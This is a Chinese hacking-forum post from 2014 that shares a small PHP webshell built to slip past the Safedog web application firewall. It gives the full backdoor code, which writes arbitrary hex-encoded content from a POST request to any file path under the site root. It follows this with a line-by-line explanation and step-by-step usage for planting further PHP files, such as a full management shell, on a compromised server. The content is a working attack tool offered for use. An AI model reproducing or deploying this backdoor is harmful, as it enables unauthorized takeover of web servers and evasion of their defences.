搜索
查看: 698|回复: 0

php绕过安全狗检测的小马分享

[复制链接]

1839

主题

2255

帖子

1万

积分

管理员

Rank: 9Rank: 9Rank: 9

积分
11913
发表于 2014-8-29 09:39:11 | 显示全部楼层 |阅读模式
直接上代码:
  1. <?php
  2. $p=realpath(dirname(__FILE__)."/../").$_POST["a"];
  3. $t=$_POST["b"];
  4. $tt="";
  5. for ($i=0;$i<strlen($t);$i+=2) $tt.=urldecode("%".substr($t,$i,2));
  6. @fwrite(fopen($p,"w"),$tt);
  7. echo "success!";
  8. ?>
复制代码

分析利用&过狗:
<?php
$p=realpath(dirname(__FILE__)."/../").$_POST["a"]; //定义$p为根目录的物理路径+$_POST["a"]的内容
$t=$_POST["b"]; //定义$t为$_POST["b"]的内容
$tt=""; //定义$tt为空
for ($i=0;$i<strlen($t);$i+=2) $tt.=urldecode("%".substr($t,$i,2)); //for循环次数是$t长度/2,每循环一次就让$tt加上“%xx”这样的编码
@fwrite(fopen($p,"w"),$tt); //写入文件地址是$p,内容是$tt
echo "success!";
?>

利用方法:
将写入的内容用url编码,比如<?php phpinfo();?>
编码后为:%3C%3F%70%68%70%20%70%68%70%69%6E%66%6F%28%29%3B%3F%3E
去掉其中的%,得到:3C3F70687020706870696E666F28293B3F3E
然后访问后门,将POST内容改为:
a=/111.php&b=3C3F70687020706870696E666F28293B3F3E
即可写入内容

过狗:



PS:最终要写进去的有管理功能的文件还是要求得过狗才行
过段时间可能会取消签到功能了
您需要登录后才可以回帖 登录 | Join BUC

本版积分规则

Powered by Discuz!

© 2012-2015 Baiker Union of China.

快速回复 返回顶部 返回列表